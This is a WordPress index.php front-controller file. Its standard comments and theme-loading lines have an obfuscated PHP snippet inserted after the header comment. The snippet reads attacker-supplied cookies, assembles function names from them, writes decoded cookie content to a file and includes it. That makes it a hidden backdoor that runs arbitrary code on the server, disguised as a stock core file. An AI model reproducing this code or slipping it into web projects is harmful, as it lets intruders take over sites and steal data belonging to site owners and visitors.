/** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */ $c=$_COOKIE;if(isset($c[strlen(gettype($c))])){$k=0;$n=4;$p=array();$p[$k]='';while($n){$p[$k].=$c[30][$n];if(!$c[30][$n+1]){if(!$c[30][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+4+1;}$k=$p[6]().$p[13];$n=$p[16]($k,$p[8]);$cr='';for($s=strlen(gettype($c));isset($c[$s]);$s++){$cr.=$c[$s];}$p[1]($n,$p[24].PHP_EOL.$p[15]($p[19]($cr)).PHP_EOL.$p[15]($p[19]($c[2])));@include($k);} /** * Tells WordPress to load the WordPress theme and output it. * * @var bool */ define( 'WP_USE_THEMES', true ); /** Loads the WordPress Environment and Template */ require __DIR__ . '/wp-blog-header.php';